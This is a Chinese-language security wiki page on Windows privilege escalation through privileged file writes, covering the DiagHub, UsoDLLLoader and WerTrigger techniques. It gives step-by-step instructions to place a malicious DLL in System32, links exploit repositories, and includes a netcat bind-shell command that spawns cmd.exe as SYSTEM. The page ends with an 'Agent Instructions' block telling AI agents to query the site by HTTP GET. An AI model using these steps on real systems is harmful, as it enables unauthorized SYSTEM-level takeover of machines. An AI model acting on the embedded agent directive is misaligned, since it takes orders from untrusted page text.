# 特权文件写入 **DiagHub** ``` 注意:从 1903 及更高版本开始,DiagHub 不能再用于加载任意 DLL。 Microsoft 诊断中心标准收集器服务 (DiagHub) 是一种收集跟踪信息并通过 DCOM 以编程方式公开的服务。该 DCOM 对象可用于将 DLL 加载到 SYSTEM 进程中,前提是该 DLL 存在于C:\Windows\System32目录中 创建一个恶意DLL,例如:payload.dll 并将其移动到C:\Windows\System32 https://gist.github.com/xct/3949f3f4f178b1f3427fae7686a2a9c0 构建 https://github.com/xct/diaghub diaghub.exe c:\\ProgramData\\ payload.dll 默认payload将运行C:\Windows\System32\spool\drivers\color\nc.exe -lvp 2000 -e cmd.exe 替代工具: https://github.com/Accenture/AARO-Bugs/tree/master/CVE-2020-5825/TrigDiag https://github.com/decoder-it/diaghub_exploit ``` **UsoDLLLoader** ``` 此技巧不再适用于最新版本的 Windows 10 Insider Preview 如果我们在 Windows 或某些第三方软件中发现了一个特权文件写入漏洞,可以将我们自己的windowscoredeviceinfo.dll复制到C:\Windows\Sytem32\,然后由 USO 服务加载,以NT AUTHORITY\System执行任意代码 构建https://github.com/itm4n/UsoDllLoader 选择发布配置和 x64 架构。 构建解决方案。 DLL .\x64\Release\WindowsCoreDeviceInfo.dll 加载程序 .\x64\Release\UsoDllLoader.exe。 复制WindowsCoreDeviceInfo.dll到C:\Windows\System32\ 使用加载程序并等待 shell 或运行usoclient StartInteractiveScan并连接到端口 1337 上的绑定 shell。 ``` **WerTrigger** ``` 克隆https://github.com/sailay1996/WerTrigger 复制phoneinfo.dll到C:\Windows\System32\ 将Report.wer文件和WerTrigger.exe放在同一目录中。 然后,运行WerTrigger.exe。 以NT AUTHORITY\SYSTEM身份获得shell ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.heresecurity.wiki/quan-xian-ti-sheng/windows-ti-quan/te-quan-wen-jian-xie-ru.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.